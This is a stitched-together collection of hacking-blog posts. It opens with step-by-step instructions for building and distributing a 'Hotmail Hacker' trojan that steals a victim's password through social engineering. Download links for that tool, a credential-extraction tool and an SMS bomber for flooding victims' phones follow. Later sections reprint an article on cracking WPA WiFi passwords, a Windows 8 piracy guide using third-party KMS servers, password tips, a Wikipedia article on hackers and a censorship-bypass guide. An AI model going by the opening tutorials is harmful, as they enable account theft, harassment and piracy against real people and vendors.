HACK HOTMAIL ACCOUNTS : HOTMAIL HACKER

I had previously discussed about Gmail Hacker to hack Gmail accounts. Likewise, this software can hack Hotmail accounts. Just follow the steps below:

1. Extract the RAR archive in a separate folder.
2. Run Hotmail Hacker Builder.exe file on your computer.
3. Enter your email address, password and subject of email you wanna receive. I suggest you to create a new email ID for this. You can use Gmail or Yahoo but avoid using Hotmail account. This email will contain the password you wanna hack. Also select appropriate smtp server address. The default smtp server address 587 is of gmail. You can google for smtp server addresses or can find it here. Also, write a fake error message to display on the screen or leave it default.
4. Click on "Build". This will create your own Hotmail hacker in Hotmail hacker folder.
5. Now, send this Hotmail Hacker.exe file to victim of which you wanna hack Hotmail password and convince him that this program can hack anyone's Hotmail password (lil bit of Social Engineering).
6. Ask him to run Hotmail Hacker.exe and enter all information including his Hotmail ID and password and Hotmail ID of victim he wanna hack. As he enters this information and hits "Login and Start", he will receive a error message.
7. You will receive an email in your account containing his password. Hooray!!! you will now be able to hack hotmail password. Enjoy!!!

Download here:

http://www.mediafire.com/download.php?zjogjlw0ndm

HACK THE HACKER : BIN TEXT

Bin Text is basically a text extractor software used to extract text from application or any file. It can extract email ID and password from applications like Hotmail Hacker and Gmail Hacker. Step by Step usage and tutorial is below:

1. Refer my article Hack Gmail Accounts : Gmail Hacker to create Gmail Hacker.exe file.
2. Unzip the downloaded Bin Text software in a separate folder.
3. Open Bin Text and browse for the location where you have kept the Gmail Hacker.exe file that you have created. Now Hit Go.
4. Bin Text will scan the whole file and display all the extracted text from Gmail Hacker.exe file.
5. Now scroll down till you find email address and password as I have shown in the screen shot above.

This means that if your friend or someone else has given you this Gmail hacker software and told you that this software can hack email accounts and if you feel suspicious of him, you can easily hack his email account password. Enjoy hacking the hacker!!!

Download here:

http://www.mediafire.com/download.php?yoeiinztzyy

SMS Bomber software

This program will bomb the victim's mobile phone with tons of SMS. It supports all major networks around the world. But if your network is not in the list, then don't worry, you can also add the carrier network with the help of "custom" option. You can also load list of multiple victims and bomb them simultaneously. The improvement that Beaver has made in this version over his previous SMS Bomber is that you can spoof the email address from which you are bombing the victim's mobile phone. For Example, If there was an error sending the message, it will ask you if you wanna change the E-mail/Password you are using. All credits to Beaver for this nice program.

Download here 

http://www.mediafire.com/download.php?zmd4mtbmtol

How I cracked my neighbor's WiFi password without breaking a sweat

Readily available tools make cracking easier.

by Dan Goodin - Aug 28 2012, 7:46am PDT

The four-way handshake, in which a wireless device (STA) validates itself to a WiFi access point and vice versa.

Last week's feature explaining why passwords are under assault like never before touched a nerve with many Ars readers, and with good reason. After all, passwords are the keys that secure Web-based bank accounts, sensitive e-mail services, and virtually every other facet of our online life. Lose control of the wrong password and it may only be a matter of time until the rest of our digital assets fall, too.

Take, for example, the hundreds of millions of WiFi networks in use all over the world. If they're like the ones within range of my office, most of them are protected by the WiFi Protected Access or WiFi Protected Access 2 security protocols. In theory, these protections prevent hackers and other unauthorized people from accessing wireless networks or even viewing traffic sent over them, but only when end users choose strong passwords. I was curious how easy it would be to crack these passcodes using the advanced hardware menus and techniques that have become readily available over the past five years. What I found wasn't encouraging.
First, the good news. WPA and WPA2 use an extremely robust password-storage regimen that significantly slows the speed of automated cracking programs. By using the PBKDF2 key derivation function along with 4,096 iterations of SHA1 cryptographic hashing algorithm, attacks that took minutes to run against the recent LinkedIn and eHarmony password dumps of June would require days or even weeks or months to complete against the WiFi encryption scheme.
What's more, WPA and WPA2 passwords require a minimum of eight characters, eliminating the possibility that users will pick shorter passphrases that could be brute forced in more manageable timeframes. WPA and WPA2 also use a network's SSID as salt, ensuring that hackers can't effectively use precomputed tables to crack the code.
That's not to say wireless password cracks can't be accomplished with ease, as I learned firsthand.
I started this project by setting up two networks with hopelessly insecure passphrases. The first step was capturing what is known as the four-way handshake, which is the cryptographic process a computer uses to validate itself to a wireless access point and vice versa. This handshake takes place behind a cryptographic veil that can't be pierced. But there's nothing stopping a hacker from capturing the packets that are transmitted during the process and then seeing if a given password will complete the transaction. With less than two hours practice, I was able to do just that and crack the dummy passwords "secretpassword" and "tobeornottobe" I had chosen to protect my test networks.

Brother, can you spare a deauth frame?

To capture a valid handshake, a targeted network must be monitored while an authorized device is validating itself to the access point. This requirement may sound like a steep hurdle, since people often stay connected to some wireless networks around the clock. It's easy to get around, however, by transmitting what's known as a deauth frame, which is a series of deauthorization packets an AP sends to client devices prior to it rebooting or shutting down. Devices that encounter a deauth frame will promptly rejoin an affected network.
Using the Silica wireless hacking tool sold by penetration-testing software provider Immunity for $2,500 a year, I had no trouble capturing a handshake established between a Netgear WGR617 wireless router and my MacBook Pro. Indeed, using freely available programs like Aircrack-ng to send deauth frames and capture the handshake isn't difficult. The nice thing about Silica is that it allowed me to pull off the hack with a single click of my mouse. In less than 90 seconds I had possession of the handshakes for the two networks in a "pcap" (that's short for packet capture) file. My Mac never showed any sign it had lost connectivity with the access points.

Enlarge / A screenshot showing Immunity Inc.'s Silica wireless penetration-testing tool in action as it sends a deauth frame and then captures the resulting four-way handshake.

Dan Goodin

I then uploaded the pcap files to CloudCracker, a software-as-a-service website that charges $17 to check a WiFi password against about 604 million possible words. Within seconds both "secretpassword" and "tobeornottobe" were cracked. A special WPA mode built-in to the freely available oclHashcat Plus password cracker retrieved the passcodes with similar ease.

It was the neighborly thing to do

Cracking such passcodes I had set up in advance to be guessed was great for demonstration purposes, but it didn't provide much satisfaction. What I really wanted to know was how much luck I'd have cracking a password that was actually being used to secure one of the networks in the vicinity of my office.
So I got the permission of one of my office neighbors to crack his WiFi password. To his chagrin, it took CloudCracker just 89 minutes to crack the 10-character, all-numerical password he used, although because the passcode wasn't contained in the entry-level, 604 million-word list, I relied on a premium, 1.2 billion-word dictionary that costs $34 to use.
My fourth hack target presented itself when another one of my neighbors was selling the above-mentioned Netgear router during a recent sidewalk sale. When I plugged it in, I discovered that he had left the eight-character WiFi password intact in the firmware. Remarkably, neither CloudCracker nor 12 hours of heavy-duty crunching by Hashcat were able to crack the passphrase. The secret: a lower-case letter, followed two numbers, followed by five more lower-case letters. There was no discernible pattern to this password. It didn't spell any word either forwards or backwards. I asked the neighbor where he came up with the password. He said it was chosen years ago using an automatic generation feature offered by EarthLink, his ISP at the time. The e-mail address is long gone, the neighbor told me, but the password lives on.
No doubt, this neighbor should have changed his password long ago, but there is a lot to admire about his security hygiene nonetheless. By resisting the temptation to use a human-readable word, he evaded a fair amount of cutting-edge resources devoted to discovering his passcode. Since the code isn't likely to be included in any password cracking word lists, the only way to crack it would be to attempt every eight-character combination of letters and numbers. Such brute-force attacks are possible, but in the best of worlds they require at least six days to exhaust all the possibilities when using Amazon's EC2 cloud computing service. WPA's use of a highly iterated implementation of the PBKDF2 function makes such cracks even harder.
Besides changing the password every six months or so and not using a 10-digit phone number, my neighbors could have taken another important step to improve their WiFi security. WPA allows for passwords with 63 characters in them, making it possible to append four or five randomly selected words—"applesmithtrashcancarradar" for instance—that are easy enough to repeat to guests who want to use your wireless network but are prohibitively hard to crack.
Yes, the gains made by crackers over the past decade mean that passwords are under assault like never before. It's also true that it's trivial for hackers in your vicinity to capture the packets of the wireless access point that routes some of your most closely held secrets. But that doesn't mean you have to be a sitting duck. When done right, it's not hard to pick a passcode that will take weeks, months, or years to crack.
With odds like that, crackers are likely to move onto easier targets, say one that relies on the quickly guessed "secretpassword" or a well-known Shakespearean quote for its security.

Activate Win8 via KMS [WORKING!]

Hi everyone
Um.. for those who haven't activated their Windows 8 yet, you can still do it by following this tutorial, read carefully! it's quite simple... KMS servers have been tested, work like a charm , so hurry before they go down


IMPORTANT!! BEFORE PROCEEDING WITH THE ACTIVATION (do not skip this):
*IF YOU ALREADY TRIED TO ACTIVATE USING SOME KIND OF UNOFFICIAL/UNTRUSTED ACTIVATOR, FIRST UNINSTALL IT, THEN RUN "sfc /scannow" IN COMMAND PROMPT (as admin) TO FIX CORRUPTED/MODIFIED SYSTEM FILES.
*MAKE SURE YOUR TIME ZONE IS CORRECT AND SYNCHRONIZE THE TIME WITH THE WINDOWS TIME SERVICE.
*NOW YOU'RE GOOD TO GO! JUST FOLLOW THE INSTRUCTIONS BELOW...


INSTRUCTIONS :
#1) Open CMD (as admin)
#2) Run these commands -one line after the other- by replacing <KMS KEY> and <KMS SERVER> with a KMS Key/Server from the links below:

slmgr.vbs -ipk <KMS KEY>
slmgr -skms <KMS SERVER>
slmgr.vbs -ato

#3) Tarraaa!! Have Fun



KMS SERVERS STATUS (UPDATED) :
***.134.1.42:1688 ---------- offline
*******.no-ip.org:80 ------- intermittent
***.dant.net.ru ------------ offline
****deltaone.net:1688 ------ online
****kms4.mooo.com:1688 ----- online
***.no-ip.org:1688 --------- online
***.columbia.edu:1688 ------ online
you can check server status here.


UPDATE 1 (ABOUT KMS ACTIVATION) : PLEASE NOTICE THAT KMS ACTIVATION IS VALID ONLY FOR 180 DAYS, AND YOU CAN RENEW IT, SO IF YOU'RE LOOKING FOR A PERMANENT ACTIVATION, THIS TUTORIAL MIGHT HELP: Activate Windows 8 Via Phone , (I USED THIS ONE ).
ANY OTHER ACTIVATION METHODS, I WOULDN'T RECOMMEND IT (AT LEAST FOR NOW, WAITING FOR A REAL ACTIVATOR).
ONE MORE THING, YOU CAN ALWAYS BACKUP YOUR ACTIVATION, FOR LATER USE...


UPDATE 2 (PHONE ACTIVATION... CHECK MAK KEY VALIDITY) : WANNA ACTIVATE WINDOWS 8 BUT YOU DON'T KNOW IF THE MAK KEY IS STILL VALID ? THIS UTILITY DOES THE JOB: PID Checker.

Ouch! too bad!! that was the last working key , waiting for new ones...




UPDATE 3 : AN OTHER WORKING KMS SERVER - THANKS TO alexmartz710 FOR SHARING

alexmartz710, on 07 October 2012 - 01:38 AM, said:

This server is also working: kms.creighton.edu:1688

IT TURNED OUT THAT BOTH ARE SAME SERVER WITH DIFFERENT DNS NAME (OTHER NAMES FOR THE SAME SERVER: winpermit7.creighton.edu...), BUT MORE IMPORTANTLY... IT DOES THE JOB




UPDATE 4 (NOTICE!):
* FOR ENTERPRISE, JUST RUN "-skms" AND "-ato" COMMANDS, NO NEED FOR A KEY AS IT'S PREINSTALLED.
* 90-DAYS EVALUATION VERSION CANNOT BE ACTIVATED (NEITHER BY KMS OR PHONE), WHEN IT EXPIRES IT'S IMPOSSIBLE TO RENEW OR REACTIVATE.
* WINDOWS  8 CORE AND PROWMC CANNOT BE ACTIVATED THROUGH KMS, SORRY


UPDATE 5 (ONE-CLICK SOLUTION) : HAVING TROUBLES APPLYING THE INSTRUCTIONS ABOVE? EASY! YOU CAN NOW GET ACTIVATED WITH JUST ONE CLICK...USING THIS SMALL *.bat FILE
-DOWNLOAD MU-


UPDATE 6 (PROWMC ACTIVATION) : KMS ACTIVATION DOESN'T  WORK WITH WINDOWS 8 PROWMC, SO IF YOU'RE PLANNING TO UPGRADE TO PROWMC, PLEASE FIRST ACTIVATE PRO VERSION, THEN AFTER ADDING WMC USE PHONE METHOD TO GET ACTIVATED.
*IF YOU MISSED PRO ACTIVATION PART, YOU'LL BE UNABLE TO INSTALL MAK KEY AFTER UPGRADING WHICH MEANS NO ACTIVATION.


UPDATE 7 (NEW KMS SERVER - BY @whwebsolutions) :
UNLIKE OTHER SERVERS, FULL SUPPORT IS PROVIDED BY @whwebsolutions TO PEOPLE WHO ACTIVATE THROUGH HIS SERVER (lunar21.no-ip.org:80) IN CASE THEY GET ERROR MESSAGES DURING ACTIVATION PROCESS, SINCE HE HAS ACCESS TO KMS ACTIVATION LOGS.
SO IF YOU FACE ANY TROUBLES, JUST LEAVE A POST WITH YOUR PC NAME AND MESSAGE ERROR CODE (example: 0XC004F074..) AND YOU'LL GET THE SOLUTION AS SOON AS POSSIBLE.

whwebsolutions, on 30 October 2012 - 01:23 AM, said:

Dear all, support for this is growing by the min. So because of this I have setup a support email account. The email is:
lunar21@hushmail.com
This account will be used for non urgent support (ie for people who are getting errors but are not in a hurry). Answers will be given within 24 hours. All new emails HAVE to have error number, PC name and about the last time of activation attempt. If I receive an email that does not have this in it, I will not answer. If you send more then 1 request (ie 1st:"Help me" then 2nd: "Please help me") then both will be deleted and support will be ONLY given thru here because as I said before this email is for non urgent support.
Please lets help all out. Most problems and resolutions have been said here already, but again Im here to help you all out .

* 0xC004F074 ERROR RESOLUTION: SET THE TIMEZONE AT (GMT +02:00 CAIRO), OR SOMTHING NO FURTHER THAN 4 HOURS AWAY FROM CAIRO TIMING, THEN SYNCHRONIZE THE TIME... IF YOU STILL GET THE SAME ERROR, CHECK SERVER STATUS IT'S STILL UP OR NOT.



UPDATE 8 (NEW! GET A FREE PRODUCT KEY TO UPGRADE TO PROWMC + PERMANENT ACTIVATION!!) :

• FIRST OF ALL, ACTIVATE WINDOWS 8 PRO BY KMS (IMPORTANT).
• GO TO MICROSOFT OFFER PAGE * AND INPUT YOUR E-MAIL, YOU WILL RECEIVE YOUR FREE PRODUCT KEY WITHIN THE NEXT 24 HOURS
• ONCE YOU HAVE THE KEY, USE IT TO UPGRADE TO PROWMC (RESTART NEEDED)
• RUN CMD >> TYPE "slui", HIT ENTER >> ACTIVATION WINDOW APPEARS, CLICK ON "ACTIVATE" BUTTON (INTERNET CONNECTION NEEDED)
• ET VOILA! WINDOWS 8 PROWMC IS PERMANENTLY ACTIVATED (BY MICROSOFT ITSELF).

* Offer valid from October 26, 2012, until January 31, 2013, and is limited to one product key per email address

• WINDOWS 8 PRO VL CANNOT BE UPGRADED TO PROWMC, NEITHER ENTERPRISE!!!
• WMC KEY PROVIDED BY MICROSOFT IS LIMITED TO ONLY ONE PC.
  TO ACTIVATE AGAIN USING THE SAME KEY, YOU MUST KEEP THE SAME HARDWARE CONFIGURATION

Password Security

People have a lot of online accounts. If you are anything like me, you will forget the majority of your passwords a week after you have placed them, and have to go through that tedious process of requesting an email notification to change it.
The one thing we shouldn't do, whether we use our Apple Mac or O2 - Samsung Galaxy, is use the same password over and over. However this is a difficult feat for most of us because face it, our memory isn't all that great. How can we possibly remember which password goes where? For the security novices, here are a couple of tips:

Storing your password

You can store them online and offline. The trick is in finding a place that is secure like LastPass or KeePass. Alternatively you can save them on your browser, however this can be dangerous if anyone were to hack into your PC, Mac or Tablet.

Resetting

Reset your password regularly to ensure your accounts are safe. You can request a new password if you have forgotten it, you can reset the password by logging into the account, or you can answer the security questions. Yes it is tedious, but worth doing.

Upper and lower case

To make your password difficult to figure out, you should add at least one upper case letter to throw off a hacker. Don't just place it at the beginning. This is the most obvious place to try. A lot of sites like iTunes use upper case as a password requirement.
There is no guarantee no matter what you do, but above all else: Don't write your passwords down! Not in a notebook, not on your hand, not on a post-it note. Unless you are planning to hide it in your safe, under the floorboards, otherwise anyone can look.

Hacker (computer security)

From Wikipedia, the free encyclopedia

Jump to: navigation, search

Hacker means someone who finds weaknesses in a computer or computer network, though the term can also refer to someone with an advanced understanding of computers and computer networks.^[1] Hackers may be motivated by a multitude of reasons, such as profit, protest, or challenge.^[2] The subculture that has evolved around hackers is often referred to as the computer underground but it is now an open community.^[3] While other uses of the word hacker exist that are not related to computer security, they are rarely used in mainstream context. They are subject to the long standing hacker definition controversy about the true meaning of the term hacker. In this controversy, the term hacker is reclaimed by computer programmers who argue that someone breaking into computers is better called a cracker,^[4] not making a difference between computer criminals (black hats) and computer security experts (white hats). Some white hat hackers claim that they also deserve the title hacker, and that only black hats should be called crackers.

History

Further information: Timeline of computer security hacker history

Bruce Sterling traces part of the roots of the computer underground to the Yippies, a 1960s counterculture movement which published the Technological Assistance Program (TAP) newsletter.^{[citation needed]} TAP was a phone phreaking newsletter that taught the techniques necessary for the unauthorized exploration of the phone network. Many people from the phreaking community are also active in the hacking community even today, and vice versa.^{[citation needed]}

Classifications

Several subgroups of the computer underground with different attitudes use different terms to demarcate themselves from each other, or try to exclude some specific group with which they do not agree. Eric S. Raymond (author of The New Hacker's Dictionary) advocates that members of the computer underground should be called crackers. Yet, those people see themselves as hackers and even try to include the views of Raymond in what they see as one wider hacker culture, a view harshly rejected by Raymond himself. Instead of a hacker/cracker dichotomy, they give more emphasis to a spectrum of different categories, such as white hat, grey hat, black hat and script kiddie. In contrast to Raymond, they usually reserve the term cracker for more malicious activity. According to (Clifford R.D. 2006) a cracker or cracking is to "gain unauthorized access to a computer in order to commit another crime such as destroying information contained in that system".^[5] These subgroups may also be defined by the legal status of their activities.^[6]

 

White hat

A white hat hacker breaks security for non-malicious reasons, perhaps to test their own security system or while working for a security company which makes security software. The term "white hat" in Internet slang refers to an ethical hacker. This classification also includes individuals who perform penetration tests and vulnerability assessments within a contractual agreement. The EC-Council, also known as the International Council of Electronic Commerce Consultants has developed certifications, courseware, classes, and online training covering the diverse arena of Ethical Hacking.^[6]

Black hat

A "black hat" hacker is a hacker who "violates computer security for little reason beyond maliciousness or for personal gain" (Moore, 2005).^[7] Black hat hackers form the stereotypical, illegal hacking groups often portrayed in popular culture, and are "the epitome of all that the public fears in a computer criminal".^[8] Black hat hackers break into secure networks to destroy data or make the network unusable for those who are authorized to use the network. They choose their targets using a two-pronged process known as the "pre-hacking stage".

Part 1: Targeting

The hacker determines what network to break into during this phase. The target may be of particular interest to the hacker, either politically or personally, or it may be picked at random. Next, they will port scan a network to determine if it is vulnerable to attacks, which is just testing all ports on a host machine for a response. Open ports—those that do respond—will allow a hacker to access the system.

Part 2: Research and Information Gathering

It is in this stage that the hacker will visit or contact the target in some way in hopes of finding out vital information that will help them access the system. The main way that hackers get desired results from this stage is from "social engineering", which will be explained below. Aside from social engineering, hackers can also use a technique called "dumpster diving". Dumpster diving is when a hacker will literally search through users' garbage in hopes of finding documents that have been thrown away, which may contain information a hacker can use directly or indirectly, to help them gain access to a network.

Part 3: Finishing The Attack

This is the stage when the hacker will invade the preliminary target that he/she was planning to attack or steal. Many "hackers" will be caught after this point, lured in or grabbed by any data also known as a honeypot (a trap set up by computer security personnel).

Grey hat

Main article: Grey hat

A grey hat hacker is a combination of a Black Hat and a White Hat Hacker. A Grey Hat Hacker may surf the internet and hack into a computer system for the sole purpose of notifying the administrator that their system has been hacked, for example. Then they may offer to repair their system for a small fee.^[8]

Elite hacker

A social status among hackers, elite is used to describe the most skilled. Newly discovered exploits will circulate among these hackers. Elite groups such as Masters of Deception conferred a kind of credibility on their members.^[9]

Script kiddie

A script kiddie (or skiddie) is a non-expert who breaks into computer systems by using pre-packaged automated tools written by others, usually with little understanding of the underlying concept—hence the term script (i.e. a prearranged plan or set of activities) kiddie (i.e. kid, child—an individual lacking knowledge and experience, immature).^[10]

Neophyte

A neophyte, "n00b", or "newbie" is someone who is new to hacking or phreaking and has almost no knowledge or experience of the workings of technology, and hacking.^[8]

Blue hat

A blue hat hacker is someone outside computer security consulting firms who is used to bug test a system prior to its launch, looking for exploits so they can be closed. Microsoft also uses the term BlueHat to represent a series of security briefing events.^[11][12][13]

Hacktivist

A hacktivist is a hacker who utilizes technology to announce a social, ideological, religious, or political message. In general, most hacktivism involves website defacement or denial-of-service attacks.

Nation state

Intelligence agencies and cyberwarfare operatives of nation states.^[14]

Organized criminal gangs

Criminal activity carried on for profit.^[14]

Bots

Automated software tools, some freeware, available for the use of any type of hacker.^[14]

Attacks

Main article: Computer insecurity

Computer security
Secure operating systems
Security by design
Secure coding
Computer insecurity
Vulnerability	Social engineering Eavesdropping
Exploits	Trojans Viruses and worms Denial of service
Payloads	Backdoors Rootkits Keyloggers
v t e

A typical approach in an attack on Internet-connected system is:

1. Network enumeration: Discovering information about the intended target.
2. Vulnerability analysis: Identifying potential ways of attack.
3. Exploitation: Attempting to compromise the system by employing the vulnerabilities found through the vulnerability analysis.^[15]

In order to do so, there are several recurring tools of the trade and techniques used by computer criminals and security experts.

Security exploits

Main article: Exploit (computer security)

A security exploit is a prepared application that takes advantage of a known weakness. Common examples of security exploits are SQL injection, Cross Site Scripting and Cross Site Request Forgery which abuse security holes that may result from substandard programming practice. Other exploits would be able to be used through FTP, HTTP, PHP, SSH, Telnet and some web-pages. These are very common in website/domain hacking.

Techniques

This section does not cite any references or sources. (August 2011)

Vulnerability scanner

Main article: Vulnerability scanner

A vulnerability scanner is a tool used to quickly check computers on a network for known weaknesses. Hackers also commonly use port scanners. These check to see which ports on a specified computer are "open" or available to access the computer, and sometimes will detect what program or service is listening on that port, and its version number. (Note that firewalls defend computers from intruders by limiting access to ports/machines both inbound and outbound, but can still be circumvented.)

Password cracking

Main article: Password cracking

Password cracking is the process of recovering passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password.

Packet sniffer

Main article: Packet sniffer

A packet sniffer is an application that captures data packets, which can be used to capture passwords and other data in transit over the network.

Spoofing attack (Phishing)

Main article: Spoofing attack

A spoofing attack involves one program, system, or website successfully masquerading as another by falsifying data and thereby being treated as a trusted system by a user or another program. The purpose of this is usually to fool programs, systems, or users into revealing confidential information, such as user names and passwords, to the attacker.

Rootkit

Main article: Rootkit

A rootkit is designed to conceal the compromise of a computer's security, and can represent any of a set of programs which work to subvert control of an operating system from its legitimate operators. Usually, a rootkit will obscure its installation and attempt to prevent its removal through a subversion of standard system security. Rootkits may include replacements for system binaries so that it becomes impossible for the legitimate user to detect the presence of the intruder on the system by looking at process tables.

Social engineering

Main article: Social engineering (computer security)

When a Hacker, typically a black hat, is in the second stage of the targeting process, he or she will typically use some social engineering tactics to get enough information to access the network. A common practice for hackers who use this technique, is to contact the system administrator and play the role of a user who cannot get access to his or her system. Hackers who use this technique have to be quite savvy and choose the words they use carefully, in order to trick the system administrator into giving them information. In some cases only an employed help desk user will answer the phone and they are generally easy to trick. Another typical hacker approach is for the hacker to act like a very angry supervisor and when the his/her authority is questioned they will threaten the help desk user with their job. Social Engineering is very effective because users are the most vulnerable part of an organization. All the security devices and programs in the world won't keep an organization safe if an employee gives away a password. Black Hat Hackers take advantage of this fact. Social Engineering can also be broken down into four sub-groups. These are intimidation, helpfulness, technical, and name-dropping.

• Intimidation As stated above, with the angry supervisor, the hacker attacks the person who answers the phone with threats to their job. Many people at this point will accept that the hacker is a supervisor and give them the needed information.
• Helpfulness Opposite to intimidation, helpfulness is taking advantage of a person natural instinct to help someone with a problem. The hacker will not get angry instead act very distressed and concerned. The help desk is the most vulnerable to this type of Social Engineering, because they generally have the authority to change or reset passwords which is exactly what the hacker needs.
• Name-Dropping Simply put, the hacker uses the names of advanced users as "key words", and gets the person who answers the phone to believe that they are part of the company because of this. Some information, like web page ownership, can be obtained easily on the web. Other information such as president and vice president names might have to be obtained via dumpster diving.
• Technical Using technology to get information is also a great way to get it. A hacker can send a fax or an email to a legitimate user in hopes to get a response containing vital information. Many times the hacker will act like he/she is involved with law enforcement and needs certain data for record keeping purposes or investigations.

Trojan horses

Main article: Trojan horse (computing)

A Trojan horse is a program which seems to be doing one thing, but is actually doing another. A trojan horse can be used to set up a back door in a computer system such that the intruder can gain access later. (The name refers to the horse from the Trojan War, with conceptually similar function of deceiving defenders into bringing an intruder inside.)

Viruses

Main article: Computer virus

A virus is a self-replicating program that spreads by inserting copies of itself into other executable code or documents. Therefore, a computer virus behaves in a way similar to a biological virus, which spreads by inserting itself into living cells.

While some are harmless or mere hoaxes most computer viruses are considered malicious.

Worms

Main article: Computer worm

Like a virus, a worm is also a self-replicating program. A worm differs from a virus in that it propagates through computer networks without user intervention. Unlike a virus, it does not need to attach itself to an existing program. Many people conflate the terms "virus" and "worm", using them both to describe any self-propagating program.

Key loggers

Main article: Keystroke logging

A key logger is a tool designed to record ('log') every keystroke on an affected machine for later retrieval. Its purpose is usually to allow the user of this tool to gain access to confidential information typed on the affected machine, such as a user's password or other private data. Some key loggers uses virus-, trojan-, and rootkit-like methods to remain active and hidden. However, some key loggers are used in legitimate ways and sometimes to even enhance computer security. As an example, a business might have a key logger on a computer used at a point of sale and data collected by the key logger could be used for catching employee fraud.

Notable intruders and criminal hackers

Main article: List of convicted computer criminals

Notable security hackers

Main article: List of hackers

• Jacob Appelbaum is an Advocate, Security Researcher, and Developer for the Tor project. He speaks internationally for usage of Tor by human rights groups and others concerned about internet anonymity and censorship.
• Albert Gonzalez sentenced to 20 years in prison.
• Eric Corley (also known as Emmanuel Goldstein) is the long standing publisher of 2600: The Hacker Quarterly. He is also the founder of the H.O.P.E. conferences. He has been part of the hacker community since the late '70s.
• Ed Cummings (also known as Bernie S) is the long standing writer for 2600: The Hacker Quarterly. He set legal precedence after denial of both a bail hearing and a speedy trial in 1995. Bernie S was charged with possession of technology which could be used for fraudulent purposes.
• Dan Kaminsky is a DNS expert who exposed multiple flaws in the protocol and investigated Sony's rootkit security issues in 2005. He has spoken in front of the US Senate on technology issues.
• Gordon Lyon, known by the handle Fyodor, authored the Nmap Security Scanner as well as many network security books and web sites. He is a founding member of the Honeynet Project and Vice President of Computer Professionals for Social Responsibility.
• Gary McKinnon is a Scottish hacker facing extradition to the United States to face charges of perpetrating what has been described as a travesty of justice with many in the UK "show a little bit of compassion" to rule sooner who also suffers from Asperger syndrome.^[16]
• Kevin Mitnick is a computer security consultant and author, formerly the most wanted computer criminal in United States history.^[17]
• Rafael Núñez aka RaFa was a notorious most wanted hacker by the FBI since 2001.
• Meredith L. Patterson a well known technologist and biohacker who has presented research with Dan Kamisky and Len Sassaman at many international security and hacker conferences.
• Len Sassaman a Belgian computer programmer and technologist who was also a privacy advocate.
• Solar Designer is the pseudonym of the founder of the Openwall Project.
• Michał Zalewski (lcamtuf) is a prominent security researcher.

Customs

The computer underground^[2] has produced its own slang and various forms of unusual alphabet use, for example 1337speak. Political attitude usually includes views for freedom of information, freedom of speech, a right for anonymity and most have a strong opposition against copyright.^{[citation needed]} Writing programs and performing other activities to support these views is referred to as hacktivism. Some go as far as seeing illegal cracking ethically justified for this goal; a common form is website defacement. The computer underground is frequently compared to the Wild West.^[18] It is common among hackers to use aliases for the purpose of concealing identity, rather than revealing their real names.

Hacker groups and conventions

Main articles: Hacker conference and Hacker group

The computer underground is supported by regular real-world gatherings called hacker conventions or "hacker cons". These draw many people every year including SummerCon (Summer), DEF CON, HoHoCon (Christmas), ShmooCon (February), BlackHat, AthCon, Hacker Halted, and H.O.P.E..^{[citation needed]}. Local Hackfest groups organize and compete to develop skills to send a team to a prominent convention to compete in group pentesting, exploit and forensics on a wider scale. In the early 1980s Hacker Groups became popular, Hacker groups provided access to information and resources, and a place to learn from other members. BBS systems like Utopias^[19] provided a platform for information sharing via dialup. Hackers could also gain credibility by being affiliated with an elite group.^[20]

Hacking and the media

This section is in a list format that may be better presented using prose. You can help by converting this section to prose, if appropriate. Editing help is available. (August 2008)

Hacker magazines

Main category: Hacker magazines

The most notable hacker-oriented magazine publications are Phrack, Hakin9 and 2600: The Hacker Quarterly. While the information contained in hacker magazines and ezines was often outdated, they improved the reputations of those who contributed by documenting their successes.^[20]

Hackers in fiction

See also: List of fictional hackers

Hackers often show an interest in fictional cyberpunk and cyberculture literature and movies. Absorption of fictional pseudonyms, symbols, values, and metaphors from these fictional works is very common.^{[citation needed]}
Books portraying hackers:

• The cyberpunk novels of William Gibson — especially the Sprawl trilogy — are very popular with hackers.^[21]
• Hackers (short stories)
• Helba from the .hack manga and anime series.
• Little Brother by Cory Doctorow
• Merlin, the protagonist of the second series in The Chronicles of Amber by Roger Zelazny is a young immortal hacker-mage prince who has the ability to traverse shadow dimensions.
• Lisbeth Salander in The Girl with the Dragon Tattoo by Stieg Larsson
• Snow Crash
• Alice from Kami-sama no Memo-chō

Films also portray hackers:

Antitrust Cypher Eagle Eye Enemy of the State Firewall Girl With The Dragon Tattoo Hackers

Live Free or Die Hard Pirates of Silicon Valley Sneakers Swordfish Take Down The Matrix series The Net

The Net 2.0 Tron Tron Legacy Untraceable WarGames Weird Science

Non-fiction books

• Hacking: The Art of Exploitation, Second Edition by Jon Erickson
• The Hacker Crackdown
• The Art of Intrusion by Kevin D. Mitnick
• The Art of Deception by Kevin D. Mitnick
• Ghost in the Wires: My Adventures as the World's Most Wanted Hacker by Kevin D. Mitnick
• The Hacker's Handbook
• The Cuckoo's Egg by Clifford Stoll
• Underground by Suelette Dreyfus
• Stealing the Network: How to Own the Box, How to Own an Identity, and How to Own an Continent by various authors

Fiction books

• Ender's Game
• Evil Genius (novel)
• Neuromancer
• Snow Crash

See also

Black hat hacking Computer crime Computer hacking Cyber spying Cyber Storm Exercise Cyber warfare Exploit (computer security) Grey hat Hack value Hacker (programmer subculture) Hacker Manifesto

Hacker (term) Hacktivism IT risk List of notable hackers Mathematical beauty Metasploit Penetration test Technology assessment Vulnerability (computing) White hat Wireless hacking

source: wikipedia.com

Open Blocked Sites in Pakistan 2012

How to Open Blocked Sites in Pakistan 2012.
1.Install FireFox Latest Version .Click here
2.Install Tools>Add-ons from Firefox called Stealthy.Or download Manually Click here
3.Restart Firefox.
4.Press stealthy button to turn it on.Then Enter any site to open.
5.Press stealthy button again to turn it off.
6.Enjoy :D

             Chrom Users Can download this addon here,check out the new version of the extension for Chrome browser

How does it works:

The extension works by placing an icon on the upper right part of your browser, after installation Stealthy will be off by default, you will need to turn it on. With the click it switches between ON (green icon) and OFF (red icon), in the (unlikely) case that the proxy assigned to you doesn't work or is too slow you should turn Stealthy off and on again in order to get a new one.